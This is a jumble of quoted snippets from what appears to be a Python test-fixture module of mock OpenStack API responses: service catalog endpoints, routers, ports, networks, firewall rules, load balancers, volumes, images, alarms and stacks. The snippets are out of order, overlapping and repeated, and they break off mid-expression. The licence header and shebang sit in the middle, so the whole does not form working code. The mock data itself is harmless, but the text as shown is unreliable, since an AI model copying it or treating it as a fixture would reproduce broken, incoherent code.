"\"bf8d2e1f-221e-4908-a4ed-b6c0fd06e518\", \"security_groups\": [ \"766110ac-0fde-4c31-aed7-72a97e78310b\" ], \"status\": \"DOWN\", \"tenant_id\": \"ANOTHER_PROJECT\" } ]} REMOVE_ROUTER_INTERFACE =",
"'publicURL': COMPUTE_PUBLIC_ENDPOINT, 'region': 'RegionOne'}], 'endpoints_links': [], 'name': 'Compute Service', 'type': 'compute' }, {",
"] } LBAAS_HEALTHMONITOR_LIST = { \"health_monitors\": [ { \"admin_state_up\": True, \"tenant_id\": PROJECT_ID, \"delay\":",
"\"e479997c-650b-40a4-9dfe-77655818b0d2\"] VOLUME_BACKUP_IDS = [\"803a2ad2-893b-4b42-90d9-eb5f09a8421a\"] ROUTERS_IDS = [\"7177abc4-5ae9-4bb7-b0d4-89e94a4abf3b\", \"a9254bdb-2613-4a13-ac4c-adc581fba50d\"] PORTS_IDS = [\"d7815f5b-a228-47bb-a5e5-f139c4e476f6\"] NETWORKS_IDS =",
"\"id\": METERING_LABEL_IDS[1] } ] } FIREWALL_POLICY_LIST = { \"firewall_policies\": [ { \"name\": \"TestFireWallPolicy1\",",
"\"min_ram\": 0, \"name\": \"cirros-0.3.1-x86_64-uec-kernel\", \"owner\": PROJECT_ID, \"properties\": {}, \"protected\": False, \"size\": 4955792, \"status\":",
"\"5aa119a8-d25b-45a7-8d1b-88e127885635\"] SNAPSHOTS_IDS = [\"3fbbcccf-d058-4502-8844-6feeffdf4cb5\", \"e479997c-650b-40a4-9dfe-77655818b0d2\"] VOLUME_BACKUP_IDS = [\"803a2ad2-893b-4b42-90d9-eb5f09a8421a\"] ROUTERS_IDS = [\"7177abc4-5ae9-4bb7-b0d4-89e94a4abf3b\", \"a9254bdb-2613-4a13-ac4c-adc581fba50d\"] PORTS_IDS",
"STORAGE_CONTAINERS = ['janeausten', 'marktwain'] STORAGE_OBJECTS = [{'container': 'janeausten', 'name': 'foo'}, {'container': 'janeausten', 'name':",
"\"http://openstack.example.com/openstack/flavors/1\", \"rel\": \"bookmark\" } ] }, \"hostId\": \"16d193736a5cfdb60c697ca27ad071d6126fa13baeb670fc9d10645e\", \"id\": SERVERS_IDS[0], \"image\": { \"id\":",
"{}, \"size\": 1, \"snapshot_id\": None, \"source_volid\": None, \"status\": \"available\", \"volume_type\": \"None\" }, {",
"= { \"routers\": [{ \"status\": \"ACTIVE\", \"external_gateway_info\": {\"network_id\": \"3c5bcddd-6af9-4e6b-9c3e-c153e521cab8\"}, \"name\": \"second_routers\", \"admin_state_up\": True,",
"'type': 'object-store' }, { 'endpoints': [{ 'adminURL': 'http://neutron.usr.lab0.aub.cw-labs.net:9696', 'internalURL': NETWORK_INTERNAL_ENDPOINT, 'publicURL': NETWORK_PUBLIC_ENDPOINT, 'region':",
"None, \"source_ip_address\": None, \"destination_ip_address\": None, \"firewall_policy_id\": None, \"position\": None, \"destination_port\": \"80\", \"id\": FIREWALL_RULE_IDS[1],",
"STORAGE_PUBLIC_ENDPOINT = 'http://public:8080/v1/AUTH_ee5b90900a4b4e85938b0ceadf4467f8' NETWORK_PUBLIC_ENDPOINT = 'https://network0.cw-labs.net' COMPUTE_PUBLIC_ENDPOINT = 'https://compute0.cw-labs.net/v2/43c9e28327094e1b81484f4b9aee74d5' METERING_PUBLIC_ENDPOINT = 'https://metric0.cw-labs.net' ORCHESTRATION_PUBLIC_ENDPOINT",
"{ \"kernel_id\": \"4e150966-cbe7-4fd7-a964-41e008d20f10\", \"ramdisk_id\": \"482fbcc3-d831-411d-a073-ddc828a7a9ed\" }, \"protected\": False, \"size\": 25165824, \"status\": \"active\", \"updated_at\":",
"0, \"min_ram\": 0, \"name\": \"cirros-0.3.1-x86_64-uec-ramdisk\", \"owner\": PROJECT_ID, \"properties\": {}, \"protected\": False, \"size\": 3714968,",
"= { \"vips\": [ { \"status\": \"ACTIVE\", \"protocol\": \"HTTP\", \"description\": \"\", \"address\": \"10.0.0.125\",",
"\"binding:vif_type\": \"ovs\", \"device_owner\": \"network:router_gateway\", \"binding:capabilities\": { \"port_filter\": False }, \"mac_address\": \"fa:16:3e:4a:3a:a2\", \"fixed_ips\": [",
"\"connection_limit\": -1, \"pool_id\": LBAAS_POOL_IDS[0], \"session_persistence\": None }, { \"status\": \"ACTIVE\", \"protocol\": \"HTTP\", \"description\":",
"\"display_description\": None, \"display_name\": \"toto\", \"id\": VOLUMES_IDS[0], \"metadata\": {}, \"size\": 1, \"snapshot_id\": None, \"source_volid\":",
"\"status\": \"available\", \"size\": 25, \"created_at\": \"2012-03-19T01:52:47Z\" } ] } VOLUME_BACKUPS_LIST = { u'backups':",
"\"security_group_id\": \"12345678-1234-1234-1234-123456789012\", \"tenant_id\": PROJECT_ID }, { \"direction\": \"ingress\", \"ethertype\": \"IPv4\", \"id\": \"f7d45c89-008e-4bab-88ad-d6811724c51c\", \"port_range_max\":",
"Service', 'type': 'ec2' }, { 'endpoints': [{ 'adminURL': 'http://admin:35357/v2.0', 'internalURL': 'http://internal:5000/v2.0', 'publicURL': 'http://public:5000/v2.0',",
"PROJECT_ID, \"binding:vif_type\": \"ovs\", \"device_owner\": \"network:router_interface\", \"binding:capabilities\": { \"port_filter\": False }, \"mac_address\": \"fa:16:3e:2d:dc:7e\", \"fixed_ips\":",
"\"protocol\": None, \"remote_group_id\": None, \"remote_ip_prefix\": None, \"security_group_id\": \"12345678-1234-1234-1234-123456789012\", \"tenant_id\": PROJECT_ID }, { \"direction\":",
"\"id\": \"664ebd1a-facd-4c20-948c-07a784475ab0\", \"device_id\": ROUTERS_IDS[0] } ] } ROUTER1_PORTS = { \"ports\": [ {",
"} ] STORAGE_OBJECTS_LIST_0 = [ { \"hash\": \"451e372e48e0f6b1114fa0724aa79fa1\", \"last_modified\": \"2014-01-15T16:41:49.390270\", \"bytes\": 14, \"name\":",
"\"network_id\": \"ebda9658-093b-41ba-80ce-0cf8cb8365d4\", \"tenant_id\": PROJECT_ID, \"binding:vif_type\": \"ovs\", \"device_owner\": \"network:router_gateway\", \"binding:capabilities\": { \"port_filter\": False },",
"14, \"name\": STORAGE_OBJECTS[0]['name'], \"content_type\":\"application/octet-stream\" }, { \"hash\": \"ed076287532e86365e841e92bfc50d8c\", \"last_modified\": \"2014-01-15T16:37:43.427570\", \"bytes\": 12, \"name\":",
"ORCHESTRATION_PUBLIC_ENDPOINT = 'https://orchestration0.cw-labs.net/v1' VOLUME_INTERNAL_ENDPOINT = 'http://internal:8776/v1/225da22d3ce34b15877ea70b2a575f58' IMAGE_INTERNAL_ENDPOINT = 'http://internal:9292' STORAGE_INTERNAL_ENDPOINT = 'http://internal:8080/v1/AUTH_ee5b90900a4b4e85938b0ceadf4467f8' NETWORK_INTERNAL_ENDPOINT",
"\"port_filter\": False }, \"mac_address\": \"fa:16:3e:2d:dc:7e\", \"fixed_ips\": [ { \"subnet_id\": \"a318fcb4-9ff0-4485-b78c-9e6738c21b26\", \"ip_address\": \"10.0.0.1\" }",
"} VOLUME_BACKUPS_LIST = { u'backups': [ {u'availability_zone': u'nova', u'container': u'volumebackups', u'created_at': u'2015-09-22T14:59:03.000000', u'description':",
"\"10.0.0.123\", \"protocol_port\": 80, \"tenant_id\": PROJECT_ID, \"admin_state_up\": True, \"weight\": 1, \"status\": \"ACTIVE\", \"status_description\": \"member",
"}, { \"status\": \"ACTIVE\", \"external_gateway_info\": {\"network_id\": \"3c5bcddd-6af9-4e6b-9c3e-c153e521cab8\"}, \"name\": \"another_router\", \"admin_state_up\": True, \"tenant_id\": \"6b96ff0cb17a4b859e1e575d221683d3\",",
"'orchestration' }], 'token': { 'expires': '2012-10-03T16:53:36Z', 'id': TOKEN_ID, 'tenant': { 'description': '', 'enabled':",
"\"Meter label test2\", \"name\": \"Meterlabel2\", \"id\": METERING_LABEL_IDS[1] } ] } FIREWALL_POLICY_LIST = {",
"\"status\": \"ACTIVE\", \"subnets\": [\"e12f0c45-46e3-446a-b207-9474b27687a6\"], \"name\": \"network_3\", \"admin_state_up\": True, \"tenant_id\": \"ed680f49ff714162ab3612d7876ffce5\", \"id\": \"afc75773-640e-403c-9fff-62ba98db1f19\", \"shared\":",
"'http://nova.usr.lab0.aub.cw-labs.net:8774/v2/43c9e28327094e1b81484f4b9aee74d5' METERING_INTERNAL_ENDPOINT = 'http://ceilometer.usr.lab0.aub.cw-labs.net:8777' ORCHESTRATION_INTERNAL_ENDPOINT = 'http://heat.usr.lab0.aub.cw-labs.net:8004/v1' AUTH_URL_RESPONSE = { u'version': { u'id':",
"\"tenant_id\": \"2f245a7b-796b-4f26-9cf9-9e82d248fda7\", \"port_id\": \"3a44f4e5-1694-493a-a1fb-393881c673a4\", \"subnet_id\": \"a2f1f29d-571b-4533-907f-5803ab96ead1\" } NETWORKS_LIST = { \"networks\": [ {",
"AUTH_URL, u'rel': u'self'}, {u'href': u'http://docs.openstack.org/api/openstack-identity-service/2.0/content/', u'rel': u'describedby', u'type': u'text/html'}, {u'href': u'http://docs.openstack.org/api/openstack-identity-service/2.0/identity-dev-guide-2.0.pdf', u'rel': u'describedby',",
"-1, \"pool_id\": LBAAS_POOL_IDS[1], \"session_persistence\": None } ] } LBAAS_POOL_LIST = { \"pools\": [",
"PROJECT_ID, \"description\": \"Meter label test1\", \"name\": \"Meterlabel1\", \"id\": METERING_LABEL_IDS[0] }, { \"tenant_id\": PROJECT_ID,",
"None, \"remote_group_id\": \"85cc3048-abc3-43cc-89b3-377341426ac5\", \"remote_ip_prefix\": None, \"security_group_id\": \"85cc3048-abc3-43cc-89b3-377341426ac5\", \"tenant_id\": PROJECT_ID }, { \"direction\": \"ingress\",",
"CONDITIONS OF ANY KIND, either express or implied. See the # License for",
"METERING_PUBLIC_ENDPOINT, 'region': 'RegionOne'}], 'endpoints_links': [], 'name': 'Metering service', 'type': 'metering' }, { 'endpoints':",
"{ \"id\": LBAAS_MEMBER_IDS[0], \"address\": \"10.0.0.122\", \"protocol_port\": 80, \"tenant_id\": PROJECT_ID, \"admin_state_up\": True, \"weight\": 1,",
"\"remote_ip_prefix\": None, \"security_group_id\": \"85cc3048-abc3-43cc-89b3-377341426ac5\", \"tenant_id\": PROJECT_ID }, { \"direction\": \"ingress\", \"ethertype\": \"IPv6\", \"id\":",
"{ 'access': { 'serviceCatalog': [{ 'endpoints': [{ 'adminURL': 'http://admin:8776/v1/225da22d3ce34b15877ea70b2a575f58', 'internalURL': VOLUME_INTERNAL_ENDPOINT, 'publicURL': VOLUME_PUBLIC_ENDPOINT,",
"\"93aa42e5-80db-4581-9391-3a608bd0e448\", \"port_range_max\": None, \"port_range_min\": None, \"protocol\": None, \"remote_group_id\": None, \"remote_ip_prefix\": None, \"security_group_id\": \"12345678-1234-1234-1234-123456789012\",",
"#!/usr/bin/env python # -*- encoding: utf-8 -*- # # Copyright © 2014 Cloudwatt",
"[ {u'href': u'%s' % AUTH_URL, u'rel': u'self'}, {u'href': u'http://docs.openstack.org/api/openstack-identity-service/2.0/content/', u'rel': u'describedby', u'type': u'text/html'},",
"\"address\": \"10.0.0.125\", \"protocol_port\": 80, \"port_id\": PRIVATE_PORT_IDS[0], \"id\": LBAAS_VIP_IDS[0], \"status_description\": \"\", \"name\": \"test-http-vip\", \"admin_state_up\":",
"\"ip_version\": 4, \"shared\": False }, { \"protocol\": \"tcp\", \"description\": \"Firewall rule 1\", \"source_port\":",
"\"tenant_id\": \"openstack\", \"updated\": \"2012-09-07T16:56:37Z\", \"user_id\": \"fake\" } ] } IMAGES_LIST = { \"images\":",
"] } ROUTER1_PORTS = { \"ports\": [ { \"status\": \"DOWN\", \"name\": \"\", \"admin_state_up\":",
"\"availability_zone\": \"nova\", \"bootable\": \"false\", \"created_at\": \"2014-02-03T14:22:52.000000\", \"display_description\": None, \"display_name\": \"toto\", \"id\": VOLUMES_IDS[0], \"metadata\":",
"'compute' }, { 'endpoints': [{ 'adminURL': 'http://admin:8773/services/Admin', 'internalURL': 'http://internal:8773/services/Cloud', 'publicURL': 'http://public:8773/services/Cloud', 'region': 'RegionOne'}],",
"u'container': u'volumebackups', u'created_at': u'2015-09-22T14:59:03.000000', u'description': u'A Volume Backup', u'fail_reason': None, u'id': u'803a2ad2-893b-4b42-90d9-eb5f09a8421a', u'links':",
"{ \"status\": \"ACTIVE\", \"name\": \"fwass-test-1\", \"admin_state_up\": True, \"tenant_id\": PROJECT_ID, \"firewall_policy_id\": FIREWALL_POLICY_IDS[0], \"id\": FIREWALL_IDS[0],",
"0, \"name\": \"cirros-0.3.1-x86_64-uec-kernel\", \"owner\": PROJECT_ID, \"properties\": {}, \"protected\": False, \"size\": 4955792, \"status\": \"active\",",
"\"name\": \"network_3\", \"admin_state_up\": True, \"tenant_id\": \"ed680f49ff714162ab3612d7876ffce5\", \"id\": \"afc75773-640e-403c-9fff-62ba98db1f19\", \"shared\": True } ] }",
"ROUTER0_PORTS = { \"ports\": [ { \"status\": \"ACTIVE\", \"name\": \"\", \"admin_state_up\": True, \"network_id\":",
"\"position\": None, \"destination_port\": \"80\", \"id\": FIREWALL_RULE_IDS[0], \"name\": \"\", \"tenant_id\": PROJECT_ID, \"enabled\": True, \"action\":",
"[ \"http://site:8000/ok\" ], \"project_id\": \"c96c887c216949acbdfbd8b494863567\", \"repeat_actions\": False, \"state\": \"ok\", \"state_timestamp\": \"2013-11-21T12:33:08.486228\", \"threshold_rule\": None,",
"\"status\": \"ACTIVE\", \"name\": \"\", \"admin_state_up\": True, \"network_id\": \"9d83c053-b0a4-4682-ae80-c00df269ce0a\", \"tenant_id\": PROJECT_ID, \"binding:vif_type\": \"ovs\", \"device_owner\":",
"[ { \"admin_state_up\": True, \"tenant_id\": PROJECT_ID, \"delay\": 5, \"expected_codes\": \"200\", \"max_retries\": 5, \"http_method\":",
"True, \"insufficient_data_actions\": [ \"http://site:8000/nodata\" ], \"name\": \"SwiftObjectAlarm\", \"ok_actions\": [ \"http://site:8000/ok\" ], \"project_id\": \"c96c887c216949acbdfbd8b494863567\",",
"0, \"min_ram\": 0, \"name\": \"cirros-0.3.1-x86_64-uec\", \"owner\": PROJECT_ID, \"properties\": { \"kernel_id\": \"4e150966-cbe7-4fd7-a964-41e008d20f10\", \"ramdisk_id\": \"482fbcc3-d831-411d-a073-ddc828a7a9ed\"",
"\"c352f4e7121c6eae958bc1570324f17e\", \"container_format\": \"aki\", \"created_at\": \"2014-02-03T14:13:52\", \"deleted\": False, \"deleted_at\": None, \"disk_format\": \"aki\", \"id\": \"4e150966-cbe7-4fd7-a964-41e008d20f10\",",
"\"volumes\": [ { \"attachments\": [], \"availability_zone\": \"nova\", \"bootable\": \"false\", \"created_at\": \"2014-02-03T14:22:52.000000\", \"display_description\": None,",
"= '<PASSWORD>' PROJECT_ID = '225da22d3ce34b15877ea70b2a575f58' AUTH_URL = \"http://localhost:5000/v2.0\" ROLE_URL = \"http://admin:35357/v2.0/OS-KSADM\" VOLUME_PUBLIC_ENDPOINT =",
"LBAAS_MEMBER_IDS = [\"37717f53-3707-49b9-9dd0-fd063e6lbass\", \"la650123-e982-4552-9dec-5dc5d3ea4172\"] LBAAS_VIP_IDS = [\"616fb98f-36ca-475e-917e-1563e5a8cd10\", \"102fbcc3-d831-411d-a333-ddc828a7a9ed\"] LBAAS_HEALTHMONITOR_IDS = [\"he717f53-3707-49b9-9dd0-fd063e6lbass\"] LBAAS_POOL_IDS =",
"compliance with the License. You may obtain # a copy of the License",
"ROUTERS_IDS = [\"7177abc4-5ae9-4bb7-b0d4-89e94a4abf3b\", \"a9254bdb-2613-4a13-ac4c-adc581fba50d\"] PORTS_IDS = [\"d7815f5b-a228-47bb-a5e5-f139c4e476f6\"] NETWORKS_IDS = [\"9d83c053-b0a4-4682-ae80-c00df269ce0a\", \"ebda9658-093b-41ba-80ce-0cf8cb8365d4\"] SECGROUPS_IDS =",
"\"stack1\", \"creation_time\": \"2015-03-03T14:08:54Z\", \"updated_time\": None, \"stack_status\": \"CREATE_SUCCESS\", \"id\": \"5c136348-5550-4ec5-8bd6-b83241844db3\" }, { \"description\": \"Second",
"\"\", \"admin_state_up\": True, \"network_id\": \"9d83c053-b0a4-4682-ae80-c00df269ce0a\", \"tenant_id\": PROJECT_ID, \"binding:vif_type\": \"ovs\", \"device_owner\": \"network:router_interface\", \"binding:capabilities\": {",
"\"links\": [ { \"href\": \"http://site/ec4083c1-3667-47d2-91c9-ce0bc8e3c2b9\", \"rel\": \"self\" } ], \"stack_status_reason\": \"\", \"stack_name\": \"stack2\",",
"-1, \"pool_id\": LBAAS_POOL_IDS[0], \"session_persistence\": None }, { \"status\": \"ACTIVE\", \"protocol\": \"HTTP\", \"description\": \"\",",
"}, 'user': { 'id': USER_ID, 'name': 'exampleuser', 'roles': [{ 'id': 'edc12489faa74ee0aca0b8a0b4d74a74', 'name': 'Member'}],",
"= '<KEY>' USER_ID = '<PASSWORD>' PROJECT_ID = '225da22d3ce34b15877ea70b2a575f58' AUTH_URL = \"http://localhost:5000/v2.0\" ROLE_URL =",
"[\"firebcc3-d831-422d-a073-ccc818a7a9id\", \"poa119a8-d25b-45a7-8d1b-88e127885630\"] FIREWALL_IDS = [\"firewal1-d831-422d-a073-ckc818a7a9ab\", \"firewa1l-d831-422d-a073-ckc818a7a9ab\"] METERING_LABEL_IDS = [\"mbcdb45e-45fe-4e04-8704-bf6f58760011\", \"meteb45e-45fe-4e04-8704-bf6f58760000\"] LBAAS_MEMBER_IDS = [\"37717f53-3707-49b9-9dd0-fd063e6lbass\",",
"ORCHESTRATION_INTERNAL_ENDPOINT = 'http://heat.usr.lab0.aub.cw-labs.net:8004/v1' AUTH_URL_RESPONSE = { u'version': { u'id': u'v2.0', u'links': [ {u'href':",
"\"id\": LBAAS_MEMBER_IDS[0], \"address\": \"10.0.0.122\", \"protocol_port\": 80, \"tenant_id\": PROJECT_ID, \"admin_state_up\": True, \"weight\": 1, \"status\":",
"None, \"firewall_policy_id\": None, \"position\": None, \"destination_port\": \"80\", \"id\": FIREWALL_RULE_IDS[1], \"name\": \"\", \"tenant_id\": PROJECT_ID,",
"{ \"ports\": [ { \"status\": \"DOWN\", \"name\": \"\", \"admin_state_up\": True, \"network_id\": \"ebda9658-093b-41ba-80ce-0cf8cb8365d4\", \"tenant_id\":",
"u'803a2ad2-893b-4b42-90d9-eb5f09a8421a', u'links': [{u'href': '%s/backups/803a2ad2-893b-4b42-90d9-eb5f09a8421a' % VOLUME_PUBLIC_ENDPOINT, u'rel': u'self'}], u'name': u'volumebackup-01', u'object_count': 22, u'size':",
"\"ip_version\": 4, \"shared\": False } ] } SERVERS_LIST = { \"servers\": [ {",
"\"volume_id\": \"76b8950a-8594-4e5b-8dce-0dfa9c696358\", \"status\": \"available\", \"size\": 25, \"created_at\": \"2012-03-19T01:52:47Z\" } ] } VOLUME_BACKUPS_LIST =",
"u'A Volume Backup', u'fail_reason': None, u'id': u'803a2ad2-893b-4b42-90d9-eb5f09a8421a', u'links': [{u'href': '%s/backups/803a2ad2-893b-4b42-90d9-eb5f09a8421a' % VOLUME_PUBLIC_ENDPOINT, u'rel':",
"[ \"http://site:8000/alarm\" ], \"alarm_id\": ALARMS_IDS[0], \"combination_rule\": None, \"description\": \"An alarm\", \"enabled\": True, \"insufficient_data_actions\":",
"\"a9254bdb-2613-4a13-ac4c-adc581fba50d\"] PORTS_IDS = [\"d7815f5b-a228-47bb-a5e5-f139c4e476f6\"] NETWORKS_IDS = [\"9d83c053-b0a4-4682-ae80-c00df269ce0a\", \"ebda9658-093b-41ba-80ce-0cf8cb8365d4\"] SECGROUPS_IDS = [\"85cc3048-abc3-43cc-89b3-377341426ac5\"] FLOATING_IPS_IDS =",
"\"name\": \"cirros-0.3.1-x86_64-uec\", \"owner\": PROJECT_ID, \"properties\": { \"kernel_id\": \"4e150966-cbe7-4fd7-a964-41e008d20f10\", \"ramdisk_id\": \"482fbcc3-d831-411d-a073-ddc828a7a9ed\" }, \"protected\": False,",
"'name': 'Identity Service', 'type': 'identity' }, { 'endpoints': [{ 'adminURL': 'http://admin:8080', 'internalURL': STORAGE_INTERNAL_ENDPOINT,",
"[{ 'adminURL': 'http://admin:8773/services/Admin', 'internalURL': 'http://internal:8773/services/Cloud', 'publicURL': 'http://public:8773/services/Cloud', 'region': 'RegionOne'}], 'endpoints_links': [], 'name': 'EC2",
"{ 'endpoints': [{ 'adminURL': 'http://admin:9292/v1', 'internalURL': IMAGE_INTERNAL_ENDPOINT, 'publicURL': IMAGE_PUBLIC_ENDPOINT, 'region': 'RegionOne'}], 'endpoints_links': [],",
"\"id\": LBAAS_POOL_IDS[0] }, { \"status\": \"ACTIVE\", \"lb_method\": \"ROUND_ROBIN\", \"protocol\": \"HTTP\", \"description\": \"\", \"health_monitors\":",
"ROLE_LIST = {u'roles': [ {u'id': u'201c290919ec4d6bb350401f8b4145a3', u'name': u'heat_stack_owner'}, {u'id': u'edc12489faa74ee0aca0b8a0b4d74a74', u'name': u'Member'}, {u'id':",
"} ] } LBAAS_MEMBER_LIST = { \"members\": [ { \"id\": LBAAS_MEMBER_IDS[0], \"address\": \"10.0.0.122\",",
"'<KEY>' USER_ID = '<PASSWORD>' PROJECT_ID = '225da22d3ce34b15877ea70b2a575f58' AUTH_URL = \"http://localhost:5000/v2.0\" ROLE_URL = \"http://admin:35357/v2.0/OS-KSADM\"",
"may # not use this file except in compliance with the License. You",
"\"\", \"binding:vif_type\": \"unbound\", \"device_id\": \"\", \"device_owner\": \"\", \"extra_dhcp_opts\": [], \"fixed_ips\": [ { \"ip_address\":",
"True, \"tenant_id\": PROJECT_ID, \"subnet_id\": \"b892434a-59f7-4404-a05d-9562977e1678\", \"connection_limit\": -1, \"pool_id\": LBAAS_POOL_IDS[0], \"session_persistence\": None }, {",
"[], \"fixed_ips\": [ { \"ip_address\": \"10.0.0.4\", \"subnet_id\": \"51351eb9-7ce5-42cf-89cd-cea0b0fc510f\" } ], \"id\": \"61c1b45e-45fe-4e04-8704-bf6f5876607d\", \"mac_address\":",
"\"tenant_id\": PROJECT_ID, \"id\": ROUTERS_IDS[0] }, { \"status\": \"ACTIVE\", \"external_gateway_info\": {\"network_id\": \"3c5bcddd-6af9-4e6b-9c3e-c153e521cab8\"}, \"name\": \"router1\",",
"{ 'endpoints': [{ 'adminURL': 'http://ceilometer.usr.lab0.aub.cw-labs.net:8777', 'internalURL': METERING_INTERNAL_ENDPOINT, 'publicURL': METERING_PUBLIC_ENDPOINT, 'region': 'RegionOne'}], 'endpoints_links': [],",
"\"created_at\": \"2014-02-03T14:13:53\", \"deleted\": False, \"deleted_at\": None, \"disk_format\": \"ari\", \"id\": \"482fbcc3-d831-411d-a073-ddc828a7a9ed\", \"is_public\": True, \"min_disk\":",
"{ u'backups': [ {u'availability_zone': u'nova', u'container': u'volumebackups', u'created_at': u'2015-09-22T14:59:03.000000', u'description': u'A Volume Backup',",
"PROJECT_ID, \"firewall_policy_id\": FIREWALL_POLICY_IDS[0], \"id\": FIREWALL_IDS[0], \"description\": \"\" }, { \"status\": \"ACTIVE\", \"name\": \"fwass-test-2\",",
"\"ACTIVE\", \"status_description\": \"member test1\", \"pool_id\": LBAAS_POOL_IDS[0] }, { \"id\": LBAAS_MEMBER_IDS[1], \"address\": \"10.0.0.123\", \"protocol_port\":",
"ROUTER1_PORTS = { \"ports\": [ { \"status\": \"DOWN\", \"name\": \"\", \"admin_state_up\": True, \"network_id\":",
"\"address\": \"10.0.0.126\", \"protocol_port\": 80, \"port_id\": PRIVATE_PORT_IDS[1], \"id\": LBAAS_VIP_IDS[1], \"status_description\": \"\", \"name\": \"test-http-vip\", \"admin_state_up\":",
"backup\", \"volume_id\": \"76b8950a-8594-4e5b-8dce-0dfa9c696358\", \"status\": \"available\", \"size\": 25, \"created_at\": \"2012-03-19T01:52:47Z\" } ] } VOLUME_BACKUPS_LIST",
"True, \"action\": \"allow\", \"ip_version\": 4, \"shared\": False }, { \"protocol\": \"tcp\", \"description\": \"Firewall",
"\"id\": LBAAS_MEMBER_IDS[1], \"address\": \"10.0.0.123\", \"protocol_port\": 80, \"tenant_id\": PROJECT_ID, \"admin_state_up\": True, \"weight\": 1, \"status\":",
"], \"stack_status_reason\": \"\", \"stack_name\": \"stack1\", \"creation_time\": \"2015-03-03T14:08:54Z\", \"updated_time\": None, \"stack_status\": \"CREATE_SUCCESS\", \"id\": \"5c136348-5550-4ec5-8bd6-b83241844db3\"",
"\"name\": \"another_router\", \"admin_state_up\": True, \"tenant_id\": \"6b96ff0cb17a4b859e1e575d221683d3\", \"id\": \"7177abc4-5ae9-4bb7-b0d4-89e94a4abf3b\" }] } ROUTER_CLEAR_GATEWAY = {",
"\"tenant_id\": PROJECT_ID, \"binding:vif_type\": \"ovs\", \"device_owner\": \"network:router_gateway\", \"binding:capabilities\": { \"port_filter\": False }, \"mac_address\": \"fa:16:3e:b9:ef:05\",",
"FIREWALL_RULE_LIST = { \"firewall_rules\": [ { \"protocol\": \"tcp\", \"description\": \"Firewall rule 1\", \"source_port\":",
"{ 'endpoints': [{ 'adminURL': 'http://neutron.usr.lab0.aub.cw-labs.net:9696', 'internalURL': NETWORK_INTERNAL_ENDPOINT, 'publicURL': NETWORK_PUBLIC_ENDPOINT, 'region': 'RegionOne'}], 'endpoints_links': [],",
"\"disk_format\": \"aki\", \"id\": \"4e150966-cbe7-4fd7-a964-41e008d20f10\", \"is_public\": True, \"min_disk\": 0, \"min_ram\": 0, \"name\": \"cirros-0.3.1-x86_64-uec-kernel\", \"owner\":",
"None, \"remote_group_id\": None, \"remote_ip_prefix\": None, \"security_group_id\": \"85cc3048-abc3-43cc-89b3-377341426ac5\", \"tenant_id\": PROJECT_ID }, { \"direction\": \"ingress\",",
"\"http://admin:35357/v2.0/OS-KSADM\" VOLUME_PUBLIC_ENDPOINT = 'http://public:8776/v1/225da22d3ce34b15877ea70b2a575f58' IMAGE_PUBLIC_ENDPOINT = 'http://public:9292' STORAGE_PUBLIC_ENDPOINT = 'http://public:8080/v1/AUTH_ee5b90900a4b4e85938b0ceadf4467f8' NETWORK_PUBLIC_ENDPOINT = 'https://network0.cw-labs.net'",
"\"tenant_id\": PROJECT_ID, \"audited\": False, \"shared\": False, \"id\": FIREWALL_POLICY_IDS[0], \"description\": \"Testing firewall policy 1\"",
"\"name\": \"TestFireWallPolicy1\", \"firewall_rules\": [FIREWALL_RULE_IDS[0]], \"tenant_id\": PROJECT_ID, \"audited\": False, \"shared\": False, \"id\": FIREWALL_POLICY_IDS[0], \"description\":",
"\"4e150966-cbe7-4fd7-a964-41e008d20f10\", \"is_public\": True, \"min_disk\": 0, \"min_ram\": 0, \"name\": \"cirros-0.3.1-x86_64-uec-kernel\", \"owner\": PROJECT_ID, \"properties\": {},",
"[ { \"status\": \"DOWN\", \"name\": \"\", \"admin_state_up\": True, \"network_id\": \"ebda9658-093b-41ba-80ce-0cf8cb8365d4\", \"tenant_id\": PROJECT_ID, \"binding:vif_type\":",
"\"mac_address\": \"fa:16:3e:4a:3a:a2\", \"fixed_ips\": [ { \"subnet_id\": \"aca4d43c-c48c-4a2c-9bb6-ba374ef7e135\", \"ip_address\": \"172.24.4.226\" } ], \"id\": \"c5ca7017-c390-4ccc-8cd7-333747e57fef\",",
"u'volume_id': u'45baf976-c20a-4894-a7c3-c94b7376bf55'} ] } ROUTERS_LIST = { \"routers\": [{ \"status\": \"ACTIVE\", \"external_gateway_info\": {\"network_id\":",
"[\"2f245a7b-796b-4f26-9cf9-9e82d248fda7\", \"61cea855-49cb-4846-997d-801b70c71bdd\"] SERVERS_IDS = [\"616fb98f-46ca-475e-917e-2563e5a8cd19\"] IMAGES_IDS = [\"37717f53-3707-49b9-9dd0-fd063e6b9fc5\", \"4e150966-cbe7-4fd7-a964-41e008d20f10\", \"482fbcc3-d831-411d-a073-ddc828a7a9ed\"] ALARMS_IDS = [\"ca950223-e982-4552-9dec-5dc5d3ea4172\"]",
"\"tenant_id\": PROJECT_ID, \"subnet_id\": \"b892434a-59f7-4404-a05d-9562977e1678\", \"connection_limit\": -1, \"pool_id\": LBAAS_POOL_IDS[0], \"session_persistence\": None }, { \"status\":",
"{ \"ip_address\": \"10.0.0.4\", \"subnet_id\": \"51351eb9-7ce5-42cf-89cd-cea0b0fc510f\" } ], \"id\": UNBOUND_PORT_ID, \"mac_address\": \"fa:16:3e:f5:62:22\", \"name\": \"custom",
"ROUTERS_IDS[0] }, { \"status\": \"ACTIVE\", \"external_gateway_info\": {\"network_id\": \"3c5bcddd-6af9-4e6b-9c3e-c153e521cab8\"}, \"name\": \"router1\", \"admin_state_up\": True, \"tenant_id\":",
"\"/\", \"type\": \"HTTP\", \"id\": LBAAS_HEALTHMONITOR_IDS[0] } ] } LBAAS_VIP_LIST = { \"vips\": [",
"None, \"remote_group_id\": \"85cc3048-abc3-43cc-89b3-377341426ac5\", \"remote_ip_prefix\": None, \"security_group_id\": \"12345678-1234-1234-1234-123456789012\", \"tenant_id\": PROJECT_ID }, { \"direction\": \"ingress\",",
"] } FIREWALL_POLICY_LIST = { \"firewall_policies\": [ { \"name\": \"TestFireWallPolicy1\", \"firewall_rules\": [FIREWALL_RULE_IDS[0]], \"tenant_id\":",
"\"nova\", \"admin_state_up\": True, \"tenant_id\": PROJECT_ID, \"id\": NETWORKS_IDS[1], \"shared\": False }, { \"status\": \"ACTIVE\",",
"4, \"shared\": False }, { \"protocol\": \"tcp\", \"description\": \"Firewall rule 1\", \"source_port\": None,",
"\"subnet_id\": \"b892434a-49f7-4404-a05d-9562977e1678\", \"connection_limit\": -1, \"pool_id\": LBAAS_POOL_IDS[1], \"session_persistence\": None } ] } LBAAS_POOL_LIST =",
